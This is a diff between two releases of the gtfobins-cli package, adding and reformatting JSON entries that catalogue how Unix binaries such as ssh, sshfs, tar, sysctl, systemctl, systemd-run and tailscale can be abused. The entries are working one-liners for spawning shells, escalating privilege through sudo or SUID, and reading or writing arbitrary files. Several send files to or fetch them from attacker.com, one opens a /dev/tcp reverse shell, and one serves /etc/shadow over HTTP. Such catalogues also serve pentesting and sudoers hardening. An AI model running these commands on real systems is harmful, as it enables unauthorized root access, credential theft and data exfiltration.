gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/ssh-copy-id.json

@@ -0,0 +1,24 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "ssh-copy-id -f -i /path/to/input-file.pub user@attacker.com",
+        "comment": "The input file must have the `.pub` file extension. The file will be copied to `~/.ssh/authorized_keys`, otherwise the `-t /path/to/output-file` option can be used.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ],
+    "file-write": [
+      {
+        "code": "ssh-copy-id -f -i /path/to/input-file.pub -t /path/to/output-file user@host",
+        "comment": "The input file must have the `.pub` file extension.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

gtfo/data/ssh-keygen.json

@@ -2,20 +2,20 @@
   "functions": {
     "library-load": [
       {
-        "description": "",
-        "code": "ssh-keygen -D ./lib.so"
+        
+        "code": "ssh-keygen -D ./lib.so\n"
       }
     ],
     "sudo": [
       {
-        "description": "",
-        "code": "sudo ssh-keygen -D ./lib.so"
+        
+        "code": "sudo ssh-keygen -D ./lib.so\n"
       }
     ],
     "suid": [
       {
-        "description": "",
-        "code": "./ssh-keygen -D ./lib.so"
+        
+        "code": "./ssh-keygen -D ./lib.so\n"
       }
     ]
   }

gtfo/data/ssh-keyscan.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nssh-keyscan -f $LFILE\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./ssh-keyscan -f $LFILE\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo ssh-keyscan -f $LFILE\n"
+      }
+    ]
+  }
+}

gtfo/data/ssh.json

@@ -3,36 +3,40 @@
     "shell": [
       {
         "description": "Reconnecting may help bypassing restricted shells.",
-        "code": "ssh localhost $SHELL --noprofile --norc"
+        "code": "ssh localhost $SHELL --noprofile --norc\n"
       },
       {
         "description": "Spawn interactive shell through ProxyCommand option.",
-        "code": "ssh -o ProxyCommand=';sh 0<&2 1>&2' x"
+        "code": "ssh -o ProxyCommand=';sh 0<&2 1>&2' x\n"
+      },
+      {
+        "description": "Spawn interactive shell on client, requires a successful connection towards `host`.",
+        "code": "ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host\n"
       }
     ],
     "file-upload": [
       {
         "description": "Send local file to a SSH server.",
-        "code": "ssh [user@host] \"cat > [destination_file]\" < [source_file]\n"
+        "code": "HOST=user@attacker.com\nRPATH=file_to_save\nLPATH=file_to_send\nssh $HOST \"cat > $RPATH\" < $LPATH\n"
       }
     ],
     "file-download": [
       {
         "description": "Fetch a remote file from a SSH server.",
-        "code": "ssh [user@host] \"cat [source_file]\" > [destination_file]\n"
+        "code": "HOST=user@attacker.com\nRPATH=file_to_get\nLPATH=file_to_save\nssh $HOST \"cat $RPATH\" > $LPATH\n"
       }
     ],
     "file-read": [
       {
         "description": "The read file content is corrupted by error prints.",
-        "code": "ssh -F [file] localhost\n"
+        "code": "LFILE=file_to_read\nssh -F $LFILE localhost\n"
       }
     ],
     "sudo": [
       {
         "description": "Spawn interactive root shell through ProxyCommand option.",
-        "code": "sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x"
+        "code": "sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x\n"
       }
     ]
   }
-}
+}

gtfo/data/sshfs.json

@@ -0,0 +1,42 @@
+{
+  "functions": {
+    "command": [
+      {
+        "blind": true,
+        "code": "sshfs -o ssh_command=/path/to/command x: /path/to/dir/",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ],
+    "download": [
+      {
+        "code": "sshfs user@attacker.com:/ /path/to/dir/\ncp /path/to/dir/path/to/input-file /path/to/output-file",
+        "contexts": {
+          "unprivileged": null
+        },
+        "sender": "ssh-server"
+      }
+    ],
+    "shell": [
+      {
+        "code": "echo -e '/bin/sh </dev/tty >/dev/tty 2>/dev/tty' >/path/to/temp-file\nchmod +x /path/to/temp-file\nsshfs -o ssh_command=/path/to/temp-file x: /path/to/dir/",
+        "comment": "The mount dir must be writable by the invoking user.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ],
+    "upload": [
+      {
+        "code": "sshfs user@attacker.com:/ /path/to/dir/\ncp /path/to/input-file /path/to/dir/",
+        "contexts": {
+          "unprivileged": null
+        },
+        "receiver": "ssh-server"
+      }
+    ]
+  }
+}

gtfo/data/sshpass.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "sshpass /bin/sh\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./sshpass /bin/sh -p\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo sshpass /bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/sshuttle.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. The output of the executed command is in /tmp/root_id",
+        "code": "sudo sshuttle -r root@anything --ssh-cmd \"/bin/bash -c 'id>/tmp/root_id'\" 192.168.3.3\n"
+      }
+    ]
+  }
+}

gtfo/data/start-stop-daemon.json

@@ -2,18 +2,21 @@
   "functions": {
     "shell": [
       {
-        "code": "start-stop-daemon -n $RANDOM -S -x /bin/sh"
+        
+        "code": "start-stop-daemon -n $RANDOM -S -x /bin/sh\n"
       }
     ],
     "suid": [
       {
-        "code": "./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p"
+        
+        "code": "./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo start-stop-daemon -n $RANDOM -S -x /bin/sh"
+        
+        "code": "sudo start-stop-daemon -n $RANDOM -S -x /bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/stdbuf.json

@@ -2,18 +2,21 @@
   "functions": {
     "shell": [
       {
-        "code": "stdbuf -i0 /bin/sh"
+        
+        "code": "stdbuf -i0 /bin/sh\n"
       }
     ],
     "suid": [
       {
-        "code": "./stdbuf -i0 /bin/sh -p"
+        
+        "code": "./stdbuf -i0 /bin/sh -p\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo stdbuf -i0 /bin/sh"
+        
+        "code": "sudo stdbuf -i0 /bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/strace.json

@@ -2,23 +2,26 @@
   "functions": {
     "file-write": [
       {
-        "description": "The data to be written appears amid the syscall log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough. More generally, any binary that executes whatever syscall passing arbitrary data can be used in place of 'strace - [data]'.",
-        "code": "strace -s 999 -o [file] strace - [data]\n"
+        "description": "The data to be written appears amid the syscall log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough. More generally, any binary that executes whatever syscall passing arbitrary data can be used in place of `strace - DATA`.",
+        "code": "LFILE=file_to_write\nstrace -s 999 -o $LFILE strace - DATA\n"
       }
     ],
     "shell": [
       {
-        "code": "strace -o /dev/null /bin/sh"
+        
+        "code": "strace -o /dev/null /bin/sh\n"
       }
     ],
     "suid": [
       {
-        "code": "./strace -o /dev/null /bin/sh -p"
+        
+        "code": "./strace -o /dev/null /bin/sh -p\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo strace -o /dev/null /bin/sh"
+        
+        "code": "sudo strace -o /dev/null /bin/sh\n"
       }
     ]
   }

gtfo/data/strings.json

@@ -1,20 +1,22 @@
 {
-  "description": "This only returns ASCII strings, thus it is not suitable for binary files.",
   "functions": {
     "file-read": [
       {
-        "code": "strings \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nstrings \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./strings \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\n./strings \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo strings \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nsudo strings \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/su.json

@@ -2,8 +2,9 @@
   "functions": {
     "sudo": [
       {
-        "code": "sudo su"
+        
+        "code": "sudo su\n"
       }
     ]
   }
-}
+}

gtfo/data/sudo.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        
+        "code": "sudo sudo /bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/svn.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "",
+        "code": "TD=$(mktemp -d)\nsvnadmin create $TD/pwn\nsvn checkout file:///$TD/pwn $TD/project\necho -e '#!/bin/bash\\n/bin/sh' > $TD/shell\nchmod +x $TD/shell\nsudo svn diff --diff-cmd \"$TD/shell\"\n"
+      }
+    ]
+  }
+}

gtfo/data/sysctl.json

@@ -1,20 +1,28 @@
 {
-  "description": "The '-p' argument can also be used in place of '-n'. In both cases though the output might get corrupted, so this might not be suitable to read binary files.",
   "functions": {
+    "command": [
+      {
+        "description": "The command is executed by root in the background when a core dump occurs.",
+        "code": "COMMAND='/bin/sh -c id>/tmp/id'\nsysctl \"kernel.core_pattern=|$COMMAND\"\nsleep 9999 &\nkill -QUIT $!\ncat /tmp/id\n"
+      }
+    ],
     "file-read": [
       {
-        "code": "/usr/sbin/sysctl -n \"/../../[file]\"\n"
+        "description": "The `-p` argument can also be used in place of `-n`. In both cases though the output might get corrupted, so this might not be suitable to read binary files.",
+        "code": "LFILE=file_to_read\n/usr/sbin/sysctl -n \"/../../$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./sysctl -n \"/../../[file]\"\n"
+        
+        "code": "COMMAND='/bin/sh -c id>/tmp/id'\n./sysctl \"kernel.core_pattern=|$COMMAND\"\nsleep 9999 &\nkill -QUIT $!\ncat /tmp/id\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo sysctl -n \"/../../[file]\"\n"
+        
+        "code": "COMMAND='/bin/sh -c id>/tmp/id'\nsudo sysctl \"kernel.core_pattern=|$COMMAND\"\nsleep 9999 &\nkill -QUIT $!\ncat /tmp/id\n"
       }
     ]
   }
-}
+}

gtfo/data/systemctl.json

@@ -2,20 +2,23 @@
   "functions": {
     "suid": [
       {
-        "code": "TF=$(mktemp).service\necho '[Service]\nType=oneshot\nExecStart=/bin/sh -c \"[command] > /tmp/output\"\n[Install]\nWantedBy=multi-user.target' > $TF\n./systemctl link $TF\n./systemctl enable --now $TF\n"
+        
+        "code": "TF=$(mktemp).service\necho '[Service]\nType=oneshot\nExecStart=/bin/sh -c \"id > /tmp/output\"\n[Install]\nWantedBy=multi-user.target' > $TF\n./systemctl link $TF\n./systemctl enable --now $TF\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "TF=$(mktemp)\necho /bin/sh >$TF\nchmod +x $TF\nsudo SYSTEMD_EDITOR=$TF systemctl edit system.slice\n"
       },
       {
-        "code": "TF=$(mktemp).service\necho '[Service]\nType=oneshot\nExecStart=/bin/sh -c \"[command] > /tmp/output\"\n[Install]\nWantedBy=multi-user.target' > $TF\nsudo systemctl link $TF\nsudo systemctl enable --now $TF\n"
+        
+        "code": "TF=$(mktemp).service\necho '[Service]\nType=oneshot\nExecStart=/bin/sh -c \"id > /tmp/output\"\n[Install]\nWantedBy=multi-user.target' > $TF\nsudo systemctl link $TF\nsudo systemctl enable --now $TF\n"
       },
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
         "code": "sudo systemctl\n!sh\n"
       }
     ]
   }
-}
+}

gtfo/data/systemd-resolve.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
+        "code": "sudo systemd-resolve --status\n!sh\n"
+      }
+    ]
+  }
+}

gtfo/data/systemd-run.json

@@ -0,0 +1,60 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "Run an interactive shell using the user's default shell. The `-S` or `--shell` option can be used to invoke the default shell interactively.",
+        "code": "systemd-run -S\n"
+      },
+      {
+        "description": "Run a shell using a pseudo-terminal (PTY). The `-t` or `--pty` option can be used to run the service on a pseudo-TTY as STDIN/STDOUT/STDERR.",
+        "code": "systemd-run --pty /bin/sh\n"
+      }
+    ],
+    "command": [
+      {
+        "description": "Execute a specific command and redirect the output to a file. In this case, the command runs `id` and saves the result to `/tmp/id`.",
+        "code": "systemd-run /bin/bash -c \"/bin/id > /tmp/id\"\n"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run a reverse shell to a remote machine. The reverse shell connects to the specified IP and port. Since `systemd-run` does not handle exported environment variables, the IP address and port must be specified directly in the command. Run `nc -l -p 12345` on the attacker box to receive the shell.",
+        "code": "systemd-run /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/1337 0>&1'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Serve files from the local directory over HTTP. This requires Python to be installed. The command starts a Python HTTP server on port 8888.",
+        "code": "systemd-run python3 -m http.server 8888\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Download a file from a remote server via HTTP. The file is saved to `/tmp/file_to_save` using `curl`.",
+        "code": "systemd-run /bin/sh -c 'curl -o /tmp/file_to_save http://attacker.com/file_to_get'\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "Gain an interactive shell as root using `sudo` and `systemd-run`. The `-S` option invokes the shell.",
+        "code": "sudo systemd-run -S\n"
+      },
+      {
+        "description": "Gain a root shell using `sudo` and `systemd-run` with a pseudo-terminal (PTY).",
+        "code": "sudo systemd-run --pty /bin/sh\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "Read the contents of a file and redirect the output to another file. In this example, the contents of `/etc/passwd` are copied to `/tmp/passwd`.",
+        "code": "systemd-run /bin/sh -c \"/bin/cat /etc/passwd > /tmp/passwd\"\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "Write data to a specific file. The filename should be absolute. In this example, the string \"DATA\" is written to `/tmp/file`.",
+        "code": "systemd-run /bin/sh -c 'echo \"DATA\" > /tmp/file'\n"
+      }
+    ]
+  }
+}

gtfo/data/tac.json

@@ -1,20 +1,22 @@
 {
-  "description": "Make sure that 'RANDOM' does not appear into the file to read otherwise the content of the file is corrupted by reversing the order of 'RANDOM'-separated chunks.",
   "functions": {
     "file-read": [
       {
-        "code": "tac -s 'RANDOM' \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\ntac -s 'RANDOM' \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./tac -s 'RANDOM' \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\n./tac -s 'RANDOM' \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo tac -s 'RANDOM' \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nsudo tac -s 'RANDOM' \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/tail.json

@@ -2,18 +2,21 @@
   "functions": {
     "file-read": [
       {
-        "code": "tail -c1G [file]\n"
+        
+        "code": "LFILE=file_to_read\ntail -c1G \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./tail -c1G [file]\n"
+        
+        "code": "LFILE=file_to_read\n./tail -c1G \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo tail -c1G [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo tail -c1G \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/tailscale.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "If the user can run `/usr/bin/tailscale` as root via `sudo`, they can serve and read any file\naccessible by root. The file becomes reachable via a Tailscale-assigned domain over HTTP.\n\nExample `sudoers` entry:\n```\nray ALL=(ALL) NOPASSWD: /usr/bin/tailscale\n```\n\nExample exploitation:\n```\nsudo tailscale serve --http=8888 /etc/shadow\ncurl http://<hostname>.<tailnet>.ts.net:8888/\n```\n",
+        "code": "sudo tailscale serve --http=8888 /etc/shadow\ncurl http://<hostname>.<tailnet>.ts.net:8888/\n"
+      }
+    ]
+  }
+}

gtfo/data/tar.json

@@ -2,11 +2,12 @@
   "functions": {
     "shell": [
       {
-        "code": "tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
+        
+        "code": "tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh\n"
       },
       {
         "description": "This only works for GNU tar.",
-        "code": "tar xf /dev/null -I '/bin/sh -c \"sh <&2 1>&2\"'"
+        "code": "tar xf /dev/null -I '/bin/sh -c \"sh <&2 1>&2\"'\n"
       },
       {
         "description": "This only works for GNU tar. It can be useful when only a limited command argument injection is available.",
@@ -15,37 +16,39 @@
     ],
     "file-upload": [
       {
-        "description": "This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the 'rmt' utility installed (it should be present by default in Debian-like distributions).",
-        "code": "tar cvf [user@host]:[destination_file] [source_file] --rsh-command=/bin/ssh\n"
+        "description": "This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the `rmt` utility installed (it should be present by default in Debian-like distributions).",
+        "code": "RHOST=attacker.com\nRUSER=root\nRFILE=/tmp/file_to_send.tar\nLFILE=file_to_send\ntar cvf $RUSER@$RHOST:$RFILE $LFILE --rsh-command=/bin/ssh\n"
       }
     ],
     "file-download": [
       {
-        "description": "This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the 'rmt' utility installed (it should be present by default in Debian-like distributions).",
-        "code": "tar xvf [user@host]:[file] --rsh-command=/bin/ssh\n"
+        "description": "This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the `rmt` utility installed (it should be present by default in Debian-like distributions).",
+        "code": "RHOST=attacker.com\nRUSER=root\nRFILE=/tmp/file_to_get.tar\ntar xvf $RUSER@$RHOST:$RFILE --rsh-command=/bin/ssh\n"
       }
     ],
     "file-write": [
       {
         "description": "This only works for GNU tar.",
-        "code": "TF=$(mktemp)\necho DATA > \"$TF\"\ntar c --xform \"s@.*@[file]@\" -OP \"$TF\" | tar x -P\n"
+        "code": "LFILE=file_to_write\nTF=$(mktemp)\necho DATA > \"$TF\"\ntar c --xform \"s@.*@$LFILE@\" -OP \"$TF\" | tar x -P\n"
       }
     ],
     "file-read": [
       {
         "description": "This only works for GNU tar.",
-        "code": "tar xf [file] -I '/bin/sh -c \"cat 1>&2\"'\n"
+        "code": "LFILE=file_to_read\ntar xf \"$LFILE\" -I '/bin/sh -c \"cat 1>&2\"'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
+        
+        "code": "sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh\n"
       }
     ],
     "limited-suid": [
       {
-        "code": "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
+        
+        "code": "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/task.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "task execute /bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo task execute /bin/sh\n"
+      }
+    ]
+  }
+}